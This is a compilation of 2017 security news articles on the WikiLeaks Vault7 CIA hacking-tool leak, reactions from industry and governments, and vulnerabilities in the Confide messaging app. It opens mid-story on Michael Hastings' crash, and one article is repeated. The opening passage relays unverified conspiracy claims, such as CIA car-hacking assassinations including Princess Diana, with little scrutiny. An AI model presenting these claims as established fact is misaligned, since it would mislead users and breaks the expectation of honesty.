There is another strange particular about the incident, a worker at a business located near the site of the crash that assisted the incident told San Diego News 6 that the car was traveling too fast and that he heard explosions from within the vehicle shortly before the deadly impact.

The police confirmed that the fire inside the car was too intense for such kind of incident, the coroner had serious difficulties in analyzing the Hastings’ body.

The car was never analyzed by independent experts, despite public rumors of foul play.

The former U.S. National Coordinator for Security, Infrastructure Protection and Counterterrorism Richard A. Clarke, told the Huffington Post that the crash that killed Hastings was “consistent with a car cyber attack.”

“What has been revealed as a result of some research at universities is that it’s relatively easy to hack your way into the control system of a car, and to do such things as cause acceleration when the driver doesn’t want acceleration, to throw on the brakes when the driver doesn’t want the brakes on, to launch an air bag,” Clarke told The Huffington Post. “You can do some really highly destructive things now, through hacking a car, and it’s not that hard.”

“So if there were a cyber attack on the car — and I’m not saying there was,” Clarke added, “I think whoever did it would probably get away with it.”

“I’m not a conspiracy guy. In fact, I’ve spent most of my life knocking down conspiracy theories,” said Clarke, who ran afoul of the second Bush administration when he criticized the decision to invade Iraq after 9/11. “But my rule has always been you don’t knock down a conspiracy theory until you can prove it [wrong]. And in the case of Michael Hastings, what evidence is available publicly is consistent with a car cyber attack. And the problem with that is you can’t prove it.”

Back to the present, documents shared by Wikileaks contain details about the study of the CIA on the possibility to infect the vehicle control systems used by modern cars and trucks. The malicious code would permit the CIA to engage in nearly undetectable assassinations.

“While the Wikileaks documents confirm that this technology existed in 2014, there is reason to believe that the CIA was capable of hacking vehicles as far back as the late 1990s. Gordon Duff, senior editor of Veterans Today, wrote in 2010 about what he termed the CIA’s “Boston Brakes” assassination technique.” continues the Mintpressnews.

“In the article, Duff noted that the deaths of Chilcot Inquiry witness Richard Waddington, anti-Zionist Austrian politicians Jorg Haider and even Princess Diana all involved car crashes where the vehicle crashed into objects like concrete abutments but left no skid marks – not unlike the Hastings crash.”

According to a story published by WhoWhatWhy in 2013, Michael Hastings was investigating the use of the CIA of weaponized malware and surveillance tools.


WikiLeaks is working with software makers on Zero-Days included in the Vault7 dump
11.3.2017 securityaffairs BigBrothers

WikiLeaks announced is working with software makers on Zero-Days by sharing information on the hacking tools included in the Vault7 dump with them.
WikiLeaks announced on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA)

The Wikileaks dump, called “Vault7,” exposed the hacking capabilities of the US Intelligence Agency and its internal infrastructure.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.” reads the announcement issued by WikiLeaks by Wikileaks.

According to Wikileaks, the precious archive appears to have been circulated among former US government experts and contractors in an unauthorized manner. One of them likely provided the files to WikiLeaks.

The archive includes confidential information, malicious codes, and exploits specifically designed to target popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

The hacking tools developed by the US cyber spies can target mobile devices, desktop computers, and IoT devices such as routers and smart TVs.

Now WikiLeaks has decided to share information on the hacking tools included in the Vault7 dump with the tech companies whose products are affected. but the White House has warned that there may be legal repercussions.

The White House promptly warned that there may be legal repercussions for the organization.

The intent of Wikileaks is to protect the customers of the major companies that use the products of several major companies that are impacted by the hacking tools in the data leak.

Follow
WikiLeaks ✔ @wikileaks
Tech companies are saying they need more details of CIA attack techniques to fix them faster. Should WikiLeaks work directly with them?
6:53 PM - 8 Mar 2017
Yes, make people safe
No, they're the problem
Other (see my reply)
Vote
52,388 votes • 4 hours left
1,941 1,941 Retweets 1,846 1,846 likes
WikiLeaks initially announced it would not release any tools or exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons‘ should analyze, disarmed and published.”

wikileaks cia data leak

During a WikiLeaks press conference on March 9, 2017, Julian Assange explained that the organization decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to the additional technical details we have so that fixes can be developed and pushed out so that people can be secured,” Assange said. “And then, once this material is effectively disarmed by us, by removing critical components, we will publish additional details about what has been occurring.”

The decision was taken by WikiLeaks and its followers through a poll on Twitter about the possibility to share technical details of the hacking tools with the companies in private industry that sell the products targeted by the US intelligence.

“Yes, make people safe,” while 36 percent of respondents said “No, they’re the problem.”

“If a program or a piece of information is classified, it remains classified regardless of whether or not it is released into the public venue or not,” said White House press secretary Sean Spicer. “I would just suggest that someone consult with [the Department of Justice] regarding the legal repercussions of any individual or entity using any piece of still-classified information or technique or product that hasn’t been declassified.”

The CIA has refused to comment the authenticity of Wikileaks data leak and remarked that US law doesn’t allow the Government to spy on it citizens.

While I was writing, tech companies are already working to fix the zero-day flaws in their products and to offer customers tools to detects the presence of anomalies in their applications.

Intel Security has released a tool that allows users to check if the firmware of computers contains unauthorized code.

The Advanced Threat Research team at Intel Security developed a new module for its existing CHIPSEC open-source framework to detect rogue EFI binaries. It can be used to detect malicious code from Windows, Linux, macOS, and even from an EFI shell.


Industry Reactions to CIA Hacking Tools: Feedback Friday

11.3.2017 securityweek BigBrothers
WikiLeaks this week released information on what it claims to be a trove of CIA hacking tools. The documents made public appear to show that the intelligence agency has had the tools and capabilities to hack a wide range of systems, including mobile devices, routers, TVs and even cars.

An initial analysis conducted by tech companies, including security firms, showed that a majority of the disclosed vulnerabilities have already been patched by vendors.

Industry reactions to CIA hacking tools

WikiLeaks initially refused to release any of the actual tools and exploits, but it has now promised to share more information with tech firms in an effort to help them protect their customers. However, the White House warned that there could be legal repercussions considering that the information is classified.

The CIA has not made any comments on the authenticity of the leak, which have been dubbed “Vault 7,” but the agency pointed out that it’s legally prohibited from spying on individuals in the United States.

Contacted by SecurityWeek, industry professionals shared some thoughts on the Vault 7 leak and its implications.

And the feedback begins…

Ilia Kolochenko, CEO, High-Tech Bridge:

"I am bit surprised that this particular incident has attracted so much attention. The CIA, like any other governmental intelligence agency, uses and will continue using various hacking tools and techniques to obtain any information they need to protect the country. This is their duty. So far, we don't have any evidence that these capacities were used unlawfully, for example to violate reasonable expectation of privacy of innocent US citizens or for illicit interference with elections.

It's also at least incorrect to speak about the CIA's inability to defend itself, as the source of the leak remains unknown. This can be an insider incident, against which - no large companies or governmental agencies are protected in any country. It can also be a honeypot - to distract someone's attention from the real arsenal of the US cyber warfare. I am pretty confident that US intelligence have much bigger technical resources than the garbage exposed in the leak.

Also, intelligence agencies cooperate in many areas, including cybersecurity and cyber warfare. Therefore, the CIA's collaboration and knowledge sharing with other agencies, such as the MI5, is obvious and is a common practice."
Tom Kellermann, CEO, Strategic Cyber Ventures (SCV):

“These exploits and attack platforms allow for an actor to become telepathic. It is quite obvious that this was an act of tradecraft by a foreign power to discredit the US government and to endow dangerous attacks capabilities to the cybercriminal community. The blatant pillaging of the US cyber armory will result in a dramatic escalation of the cyber-insurgency which is raging in US cyberspace. These cyber weapons will be used by the Russian cyber militias against NATO and Western targets. Wikileaks has expanded her arms bazaar and is now distributing digital grenade launchers and uzis to the malcontents and anti-American non-state actors of the world. Cyberspace is about to become a free fire zone.”
Rick Hanson, EVP, Skyport Systems:

“This is just another clear example where an organization that conducts breaches and leaks can not be praised under ANY circumstance. Donald Trump previously praised Wikileaks during his campaign. When an organization like WikiLeaks is lauded in any forum there is reason to be concerned. The fact that Wikileaks claims to have critical CIA information should put our intel community on record.

The protection of sensitive tools and data by our intel community should be a top priority. If this leak turns out to be a reality, our governmental cybersecurity policy and implementation needs to be called into question. A key reason our intel community needs to operate only on"Zero Trust" systems with a hardware root of trust."
Ayal Yogev, VP of Product Management, SafeBreach:

“Any type of device you add to the network can be used by an attacker. This isn't new, but the information shared by Wikileaks about SmartTVs reinforces this. Additionally, while most may consider this a consumer-focused issue, in fact, SmartTVs are used by many enterprises in conference rooms and common areas. Imagine the types of executive level conversations an attacker might be privy to.

These new IoT devices are prime targets for an attacker since in many cases they are less protected than existing devices on the network and an attacker always looks for the weakest link. This is why knowing exactly what can be done from any point in your environment by a hacker is crucial. Understanding the kill chain can help enterprises prevent attacks, for example - a SmartTV may be hacked, but because there is no way to exfiltrate information from the segment the TV is in, you're breaking the kill chain, and containing the problem.”
Alex Rice, CTO, HackerOne:

"Vulnerabilities are difficult to keep as a secret, and this news break shows they don’t remain secret for long. The longer these vulnerabilities remain unpatched, the more dangerous they become because they can fall into criminal hands. The CIA put consumers at risk by not reporting these bugs to their vendors. Similarly, Wikileaks is no better at keeping secrets than the CIA and should immediately disclose any known vulnerabilities to the appropriate vendors so they can be fixed.

If there is a known vulnerability and it is not making it into the hands of the vendor so it can be resolved, something is broken. Companies and consumers should encourage the active disclosure of vulnerabilities no matter their source, this includes security researchers, active security teams, and the U.S. government. At minimum, this means a thorough review of the U.S. Government's Vulnerabilities Equities Process, which appears to have not been honored. This ultimately strains tech companies relationship with the US government. The economy relies significantly on the trust of its consumers and if consumers can’t trust U.S. made tech products, this harms competitiveness in the market."
Mikko Hypponen, Chief Research Officer, F-Secure:

“It’s no surprise that the CIA is using these hacking techniques. What is unsuspected is the leak, and it’s huge. So the question is who leaked it to Wikileaks? The Russians, an insider? We don’t know the answer. Another question we need to ask us, why was it leaked now? We don’t know this either.

In countries like the US, the Intelligence Agency’s mission is to keep the citizens of their country safe. The Vault7 leak proves that the CIA had knowledge of iPhone vulnerabilities. However, instead of informing Apple, the CIA decided to keep it secret. So the leak tells us a bit about how the CIA decided to use its knowledge: it considered it more important to keep everybody unsecure than protecting its citizens from the vulnerability, and maybe use the vulnerability for its own purposes or counter terrorism purposes.”
Nathan Wenzler, chief security strategist, AsTech:

“Could this be the age of the EULA? There have been many reports and lawsuits in recent months (Visio and Samsung come immediately to mind) of devices such as televisions recording information and potentially providing it to "third parties." Is it really any surprise to the security industry that these third parties might include government agencies such as the CIA? Where backdoors exist, there is often language present in the EULA that would suggest that the manufacturer may capture and share information.

We certainly want to believe that companies operate to the highest standards of protecting user's privacy, but there have simply been too many cases where intelligence agencies have publicly attempted to gain this sort of backdoor access through legal channels (FBI vs. Apple, anyone?) to think that no company is cooperating with these authorities. It may be time to make a serious review of licensing agreements and terms of service a standard part of our security programs, rather than the standard de facto process of blindly clicking "OK" at the bottom of the page. This doesn't necessarily make it right, moral or ethical, but, the writing has been on the wall the whole time, and these recent revelations should not come as a surprise, but rather serve as confirmation of what we have always believed was happening.”
Sanjay Kalra, Co-founder and Chief Product Officer, Lacework:

“There has been a lot of focus on the CIA leaks around exploits for Smart TV’s, connected vehicles and lot of new gadgetry. If you look closely at the list of projects, the majority of them were focused on Unix. The Unix systems are considered to be extremely safe, however, the CIA had tools to do keyboard logging, copy network traffic and intercept secure connections to Unix machines. Unix runs and stores the crown jewels in data center/cloud for most of the enterprises today and exploiting them is a gold mine. Enterprises need to first focus on security their core with breach detection and insider threat detection before looking to secure the next shiny object. Compromise to core can be disastrous.”
Chris Roberts, Chief Security Architect, Acalvio:

“One thing that is interesting is the mass of mis-directed social media indignation and ill-informed discussions about who’s been hacking where, what and when. The open library of “wild” code that is being attributed to various CIA branches is nothing more than data collected freely available on the Internet, therefore attributing hacks to the CIA because of the code fingerprints is woefully incorrect. That’s damaging both from a community not doing its research and the Intelligence community which is sitting there battered and bruised because of these loses AND now taking the heat for attacks it’s not likely done (Trump, DNC etc.)

The biggest issue is ‘we know’ most of what’s been disclosed, including hacks, code and covert operation styles. We also know what the tactics are. Heck, most of us use the very same tactical operations when engaged by clients or doing R&D. The code library is NICE to have in one place. But again, most of us have multiple snippets of various code bases.

What needs to happen now is that the intelligence community must stand up and simply say “yep, that’s us. We are at war in the electronic realm. Suck it up."
Willis McDonald, Senior Threat Manager, Core Security:

"The leaked CIA documents have potentially disastrous effects on ongoing CIA operations. If the tools detailed in the documents are still in use this now gives clues to targeted organizations as to what is of interest to the CIA. As a consequence this could also expose close contact human intelligence (HUMINT) operations leading to incarceration and possible harm to operatives.

The leak of these documents definitely has caused financial harm to the CIA. Response to the leak of the documents will require a massive research and retooling effort in the CIA. Everything from tradecraft to tools will need to be changed in order for operations to continue undetected which will cost millions of dollars and months of training and development."
Ajay Arora, CEO and Co-founder, Vera:

"If these docs prove to be authentic, everyone should once and for all throw out their blind trust that that their devices, apps or data is ever safe or private. People need to wake-up to the fact that they need to take responsibility for maintaining the privacy of their information and make no assumptions. At the end of the day, no one has your best interests in mind but you -- people can't even trust their own government any more. This is the tragic new normal we have to all unfortunately accept."
Apostolos Giannakidis, Lead Security Architect, Waratek:

"The Wikileaks release of the CIA's Vault 7 hacker tools is a dream come true for hackers and a nightmare for corporate security teams who are already under-resourced and over-stressed just trying to keep up with known threats, especially in application software.

This event highlights the risk of introducing new software code into an enterprise environment, especially from third-parties. Blindly putting unrestricted trust in software can greatly increase the risk of introducing new vulnerabilities and even hidden backdoors.

There are tools that can automate the process of identifying and increasing protection against these threats, but the attacks are likely to come faster than the defenders can implement them. It will take security teams weeks, months or even years to develop patches to address the exploits about to be unleashed into the mainstream over time.”
Gunter Ollmann, CSO, Vectra Networks:

“The CIA’s “UMBRAGE” program reveals the importance placed upon “false flag” signatures used in clandestine operations. It should be no surprise to the InfoSec community that such resources are expended to capture and duplicate the techniques used by foreign agencies and criminal organizations. It does however reinforce that the use of such techniques are, in fact, an everyday part of clandestine operational procedure – casting further doubt on public attribution disclosures – especially those quickly released and promoted by the marketing teams of commercial security vendors.”
Brian Vecci, Technical Evangelist, Varonis:

“It’s too easy for data to be stolen, even—allegedly—within the CIA’s Center for Cyber Intelligence. The entire concept of a spook is to be covert and undetectable; apparently that also applies to actions on their own network. According to WikiLeaks, this treasure trove of files was given to them by a former U.S. government contractor. The CIA is not immune to issues affecting many organizations: too much access with too little oversight and detective controls.

In performing forensics on the actual breach, the important examination is to determine how 8,761 files just walked out of one of the most secretive and confidential organizations in the world. Files that were once useful in their operations are suddenly lethal to those same operations. We call this toxic data, anything that is useful and valuable to an organization but once stole and made public turns toxic to its bottom line and reputation. All you have to do is look at Sony, Mossack Fonseca and the DNC to see the effects of this toxic data conversion.”
Philip Lieberman, President, Lieberman Software:

“Presidential Directive 20 and Title 10 provide transparency to the strategy and resources of the US Government regarding methods and technologies used for national security purposes. The creation, capabilities and usage of cyber weapons is controlled by the Senate, Congress and President in a coordinated process governed by law. The agencies themselves do not operate independently or autonomously without first receiving detailed authorization and direction from national leadership and is vetted by the judicial branch.

Questions as to the capabilities and usage of those capabilities should be directed to the Senate and President directly rather than the agencies themselves as they simply carry out operations directed from above them.

The appropriateness and usage of capabilities is a matter of politics and national security that may or may not disturb citizens. My advice is to contact your representative in Congress and the Senate and ask them for an explanation as to why and how these capabilities are used.”


CIA replies to WikiLeaks Vault7 Leak, it is operating to protect Americans
10.3.2017 securityaffairs  BigBrothers

WikiLeaks Vault7 – CIA pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities.
The U.S. Central Intelligence Agency (CIA) has issued an official statement in response to the Wikileaks Vault7 Data leak.

The US intelligence agency denies conducting a large-scale surveillance on its citizens.

According to an unnamed U.S. officials quoted by the Reuters press agency, that the most likely source of the data leak is a CIA contractor.

“Contractors likely breached security and handed over documents describing the Central Intelligence Agency’s use of hacking tools to anti-secrecy group WikiLeaks, U.S. intelligence and law enforcement officials told Reuters on Wednesday.” states the Reuters.

“Two officials speaking on condition of anonymity said intelligence agencies have been aware since the end of last year of the breach, which led to WikiLeaks releasing thousands of pages of information on its website on Tuesday.”

If confirmed, this is a very disconcerting particular, because it is not clear if the intelligence Agency has reported the incident to the IT vendors whom products could be targeted by the CIA hacking tools.

The CIA and the FBI have launched an investigation into the Wikileaks Vault7 Data leak, event if the Central Intelligence Agency did not confirm the authenticity of the huge trove of files.

The intelligence Agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities. Its mission is to protect the US from foreign governments and non-state actors such as terrorists.

“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” reads the statement issued by the CIA.

“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.

The tools in the CIA arsenal appear to have been designed for targeted attacks instead of a dragnet surveillance. The CIA pointed out that it is not allowed to Intelligence agencies and law enforcement bodies spying on individuals in the United States. The agency said its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

According to the CIA, all the operations conducted by the US agencies “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

The US Government is worried about the impact of the Vault 7 data leak on the activities conducted by US intelligence agencies. The revelations put at serious risk the efficiency of its tools and techniques.

Which are the reactions of other governments to the Wikileaks dump?

China expresses concerns at the revelations, the products of many Chinese companies may have been targeted by the CIA hackers.

“China expressed concern on Thursday over revelations in a trove of data released by Wikileaks purporting to show that the CIA can hack all manner of devices, including those made by Chinese companies.” reported the Reuters..

“Dozens of firms rushed to contain the damage from possible security weak points following the anti-secrecy organization’s revelations, although some said they needed more details of what the U.S. intelligence agency was up to.

Widely-used routers from Silicon Valley-based Cisco (CSCO.O) were listed as targets, as were those supplied by Chinese vendors Huawei [HWT.UL] and ZTE (000063.SZ) and Taiwan supplier Zyxel for their devices used in China and Pakistan.”

The Germany’s foreign ministry issued a statement saying that it is in contact with the U.S. Government to receive more information on the case.

The chief federal prosecutor’s office confirmed it would review the Wikileaks data dump related to the claims that the CIA ran a hacking hub from the U.S. consulate in Frankfurt.

“We will initiate an investigation if we see evidence of concrete criminal acts or specific perpetrators,” a spokesman for the federal prosecutor’s office told Reuters.


CIA replies to WikiLeaks Vault7 Leak, it is operating to protect Americans
10.3.2017 securityaffairs BigBrothers

WikiLeaks Vault7 – CIA pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities.
The U.S. Central Intelligence Agency (CIA) has issued an official statement in response to the Wikileaks Vault7 Data leak.

The US intelligence agency denies conducting a large-scale surveillance on its citizens.

According to an unnamed U.S. officials quoted by the Reuters press agency, that the most likely source of the data leak is a CIA contractor.

“Contractors likely breached security and handed over documents describing the Central Intelligence Agency’s use of hacking tools to anti-secrecy group WikiLeaks, U.S. intelligence and law enforcement officials told Reuters on Wednesday.” states the Reuters.

“Two officials speaking on condition of anonymity said intelligence agencies have been aware since the end of last year of the breach, which led to WikiLeaks releasing thousands of pages of information on its website on Tuesday.”

If confirmed, this is a very disconcerting particular, because it is not clear if the intelligence Agency has reported the incident to the IT vendors whom products could be targeted by the CIA hacking tools.

The CIA and the FBI have launched an investigation into the Wikileaks Vault7 Data leak, event if the Central Intelligence Agency did not confirm the authenticity of the huge trove of files.

The intelligence Agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities. Its mission is to protect the US from foreign governments and non-state actors such as terrorists.

“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” reads the statement issued by the CIA.

“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.

The tools in the CIA arsenal appear to have been designed for targeted attacks instead of a dragnet surveillance. The CIA pointed out that it is not allowed to Intelligence agencies and law enforcement bodies spying on individuals in the United States. The agency said its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

According to the CIA, all the operations conducted by the US agencies “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

The US Government is worried about the impact of the Vault 7 data leak on the activities conducted by US intelligence agencies. The revelations put at serious risk the efficiency of its tools and techniques.

Which are the reactions of other governments to the Wikileaks dump?

China expresses concerns at the revelations, the products of many Chinese companies may have been targeted by the CIA hackers.

“China expressed concern on Thursday over revelations in a trove of data released by Wikileaks purporting to show that the CIA can hack all manner of devices, including those made by Chinese companies.” reported the Reuters..

“Dozens of firms rushed to contain the damage from possible security weak points following the anti-secrecy organization’s revelations, although some said they needed more details of what the U.S. intelligence agency was up to.

Widely-used routers from Silicon Valley-based Cisco (CSCO.O) were listed as targets, as were those supplied by Chinese vendors Huawei [HWT.UL] and ZTE (000063.SZ) and Taiwan supplier Zyxel for their devices used in China and Pakistan.”

The Germany’s foreign ministry issued a statement saying that it is in contact with the U.S. Government to receive more information on the case.

The chief federal prosecutor’s office confirmed it would review the Wikileaks data dump related to the claims that the CIA ran a hacking hub from the U.S. consulate in Frankfurt.

“We will initiate an investigation if we see evidence of concrete criminal acts or specific perpetrators,” a spokesman for the federal prosecutor’s office told Reuters.


Multiple Security Gaps Found in Confide Messaging App

10.3.2017 securityweek Vulnerebility
Multiple vulnerabilities recently found in the Confide messaging application could allow an attacker to leak session information, enumerate users, and even access details such as emails and phone numbers.

Confide is promoted as a “confidential messenger” that allows users to speak freely, without fearing eavesdropping, courtesy of “military grade end-to end-encryption.” However, security researchers with IOActive and Quarkslab have discovered that users’ conversations were actually exposed to man-in-the-middle (MiTM) attacks, and also uncovered various other vulnerabilities in the messenger.

In a recent report (PDF), IOActive notes that the application’s notification system did not require a valid SSL server certificate to communicate, thus leaking session information to MiTM attacks. Furthermore, the app allowed for unencrypted messages to be delivered, without alerting the user on the matter.

During their analysis, IOActive researchers also found that the software was uploading file attachments before the user sent the intended message, and that it allowed attackers to send malformed messages that could crash, slow, or otherwise disrupt the application.

Furthermore, the application didn’t use authenticated encryption, meaning that Confide was able to alter messages in-transit, an issue discovered by Quarkslab’s Jean-Baptiste Bédrune, who published a comprehensive technical analysis detailing how Confide could perform man-in-the-middle attacks and read users’ messages.

According to Bédrune, the application didn’t use a cryptographic integrity mechanism and the cryptographic protocol did not involve authentication. When notified of a new message, the client would request a list of unread threads from the server, but had no means to verify the origin of the message and to check the sender's public key authenticity either.

“The most obvious problem is […] linked to the fact that the encrypted message origin and the authenticity of the public encryption key transmitted by the server can in no way be verified by the client,” the researcher notes. The Confide server could generate its own key pair and transmit the public part to a client, decrypt the messages sent by the client, and re-encrypt them with its own key for the actual recipient, Bédrune claims.

Other major issues discovered (PDF) by IOActive were related to account management, as it provided an attacker with the possibility to enumerate all Confide user accounts. Furthermore, the app didn’t employ a mechanism to adequately prevent brute-force attacks on user account passwords and even short, easy-to-guess passwords were allowed.

The application's website was also found to be vulnerable. Specifically, researchers discovered an arbitrary URL redirection in it and say that this could facilitate social engineering attacks against users. Additionally, the website was observed reflecting incorrectly entered passwords back to the browser.

By exploiting the vulnerabilities, an attacker could impersonate another user by hijacking their account session or by guessing their password, learn the contact details of all or specific Confide users, become an intermediary in a conversation and decrypt messages, or alter the contents of a message or attachment in transit without first decrypting it, IOActive says.

An attacker could also leak a great deal of user information, such as: usernames; whether the user has clicked the provided verification link; userIDs; the users’ public keys; the users’ phone numbers; and the users’ email addresses.

The security company tested Confide messaging app versions 4.0.4 for Android and 1.4.2 for Windows and Mac OS X and says it was able to recover more than 7,000 records for users registered between February 22-24, 2017. IOActive estimates that “between 800,000 and one million user records were potentially contained in the database.”

“Building a secure instant messaging is not easy, but when claiming it, some strong mechanisms should really be enforced since the beginning. The confidentiality of the exchanged messages depends on the robustness of TLS. Confide can technically read all the messages that pass through its servers. End-to-end encryption, as it is implemented, solely relies on the server through which the messages pass,” Bédrune notes.

Confide was alerted on the discovered issues and has already updated its mobile and desktop applications to address some of them. The company also confirmed that it could theoretically perform MiTM attacks against its users, but also says that it plans on releasing another update to add support for independent fingerprint verification.


WikiLeaks to Share CIA Hacking Tools With Tech Firms

10.3.2017 securityweek BigBrothers
WikiLeaks has decided to share information on the alleged CIA hacking tools with the tech companies whose products are affected, but the White House has warned that there may be legal repercussions.

The Vault 7 files made public this week by WikiLeaks appear to show that the intelligence agency has had the tools and capabilities to hack a wide range of systems, including mobile and desktop devices, networking equipment, and Internet of Things (IoT) devices.

The products of several major companies are mentioned in the leaks and many of them have asked the whistleblower organization to share additional information to help them ensure that their customers are protected against possible cyberattacks.

While it has published numerous documents containing technical information, WikiLeaks initially said it would not release any actual tools or exploits “until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed, disarmed and published.”

However, WikiLeaks founder Julian Assange said in a press conference on Thursday that the decision to not release the exploits limits the ability of vendors to issue security fixes. That is why WikiLeaks has decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to the additional technical details we have so that fixes can be developed and pushed out so that people can be secured,” Assange said. “And then, once this material is effectively disarmed by us, by removing critical components, we will publish additional details about what has been occurring.”

It’s worth noting that WikiLeaks has launched a poll on Twitter, asking users if more details should be shared with tech companies, and 57 percent of respondents said “Yes, make people safe,” while 36 percent of respondents said “No, they’re the problem.”

While the decision to share technical details with technology companies may be good news, White House representatives have warned about the possible legal repercussions for these firms.

“If a program or a piece of information is classified, it remains classified regardless of whether or not it is released into the public venue or not,” said White House press secretary Sean Spicer. “I would just suggest that someone consult with [the Department of Justice] regarding the legal repercussions of any individual or entity using any piece of still-classified information or technique or product that hasn’t been declassified.”

Based on the information made public by WikiLeaks, security firms and major tech companies such as Microsoft, Apple and Google have determined that many of the vulnerabilities leveraged by the alleged CIA tools don’t affect the latest versions of their products. In fact, some of the flaws were patched several years ago.

The CIA has refused to comment on the authenticity of the leaked documents, but pointed out that the agency is legally prohibited from spying on individuals in the United States.


Apple, Google Say Users Protected Against CIA Exploits

9.3.2017 securityweek BigBrothers
Apple and Google are confident that a majority of the vulnerabilities disclosed by WikiLeaks as part of the “Vault 7” release, which focuses on the hacking tools allegedly used by the U.S. Central Intelligence Agency (CIA), do not affect the latest versions of their products.

Microsoft is investigating the leaked documents, but it has yet to provide any specific information. Apple, on the other hand, said its initial analysis indicated that many of the issues mentioned in the Vault 7 leaks are patched in the latest version of its iOS operating system, and pointed out that nearly 80 percent of its customers are running the latest release.

Nevertheless, the company has promised to continue working on quickly addressing any identified flaws.

Google’s analysis is also ongoing, but the tech giant says it’s confident that the security updates and protections in Chrome and the Android operating system can shield users against many of the exploits.

The files released by WikiLeaks indicate that the CIA has had the tools and capabilities needed to hack any type of system, including mobile devices, desktop computers, networking equipment, and Internet of Things (IoT) devices.

Vulnerabilities affecting operating systems such as Android and iOS could have a critical impact as they can allow attackers to gain complete control of a device and access sensitive user information. Hackers can even obtain messages exchanged via secure applications such as Signal and Telegram without having to break their encryption.

Security firms have scrambled to assess the impact of the CIA hacking tools, but so far there is no evidence that the intelligence agency’s exploits are very sophisticated. A majority of the disclosed vulnerabilities have either been patched a long time ago, or they are considered low severity.

However, WikiLeaks has not released any of the actual exploits, making it difficult for vendors to assess the real impact. The whistleblower organization has considered providing more details to tech companies in order to allow them to fix the vulnerabilities faster.

The CIA has not commented on the authenticity of the leaked documents, but it pointed out that its mission is to collect foreign intelligence overseas in an effort to protect the U.S. from adversaries such as terrorists and hostile nation states. The CIA also noted that it is legally prohibited from spying on individuals in the United States. The agency accused WikiLeaks of jeopardizing U.S. personnel and operations.


CIA Responds to WikiLeaks Hacking Tool Dump

9.3.2017 securityweek BigBrothers

CIA: We Are Innovative but We Don’t Spy on Fellow Americans

The U.S. Central Intelligence Agency (CIA) has issued a statement in response to the claims made by WikiLeaks in regards to the agency’s hacking tools, and denied conducting electronic surveillance on Americans.

The CIA and the FBI have launched an investigation into the Vault 7 dump and unnamed U.S. officials told Reuters that the most likely source of the breach is a CIA contractor.

In its initial press release, WikiLeaks said the files, originating from the CIA’s Center for Cyber Intelligence (CCI) in Langley, Virginia, had been circulating among former government hackers and contractors. One of them allegedly provided the data to the whistleblower organization.

The CIA has refused to comment on the authenticity of the leaked documents or the status of its investigation into this incident. However, the agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities in an effort to protect America from adversaries such as terrorists and hostile nation states.

“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” the CIA said in its statement.

The nature of the tools suggests that they are designed for targeted operations – rather than mass surveillance – and the CIA pointed out that it’s legally prohibited from spying on individuals in the United States. The agency said its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

The organization has expressed concern about the impact of the Vault 7 dump on its operations.

“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.

WikiLeaks has claimed that the U.S. consulate in Frankfurt is used by the CIA as a covert base for hackers targeting Europe, the Middle East and Africa. Germany’s foreign ministry issued a statement saying that it takes such information very seriously and that it’s in touch with the U.S. on this matter.

According to Reuters, China also expressed concern after the WikiLeaks documents showed that the CIA may have targeted the devices of several Chinese companies, including Huawei and ZTE. The country once again claimed it opposes all forms of hacking and urged the U.S. to “stop listening in, monitoring, stealing secrets and internet hacking against China and other countries.”

London-based Privacy International has also issued a statement, saying that if the leaks are authentic, “they demonstrate what we’ve long been warning about government hacking powers — that they can be extremely intrusive, have enormous security implications, and are not sufficiently regulated.”

Technology companies whose products are listed in the Vault 7 leaks have launched investigations to assess the impact of the alleged CIA tools. Following an initial analysis of the available information – WikiLeaks has yet to make public any actual exploits – security firms and tech giants such as Apple and Google have determined that a majority of the vulnerabilities do not affect the latest versions of their products.


Wikileaks Vault7: CIA Umbrage team, the factory of false flag ops
9.3.2017 securityaffairs BigBrothers

Wikileaks Vault7 data leak – the Umbrage team was tasked by the Central Intelligence Agency for false flag hacking operations.
WikiLeaks has obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking tools and capabilities.Digging in the huge trove of files, it is possible to find information about the ability of the intelligence Agency in fingerprinting hacking techniques used by threat actors in the wild, both state and non-state actors.
The CIA has built a specific team of experts code-named as the Umbrage team under the Remote Development Branch inside the CIA’s Center for Cyber Intelligence.

“The CIA’s Remote Devices Branch‘s UMBRAGE group collects and maintains a substantial library of attack techniques ‘stolen’ from malware produced in other states including the Russian Federation.

With UMBRAGE and related projects the CIA cannot only increase its total number of attack types but also misdirect attribution by leaving behind the “fingerprints” of the groups that the attack techniques were stolen from.” states Wikileaks.

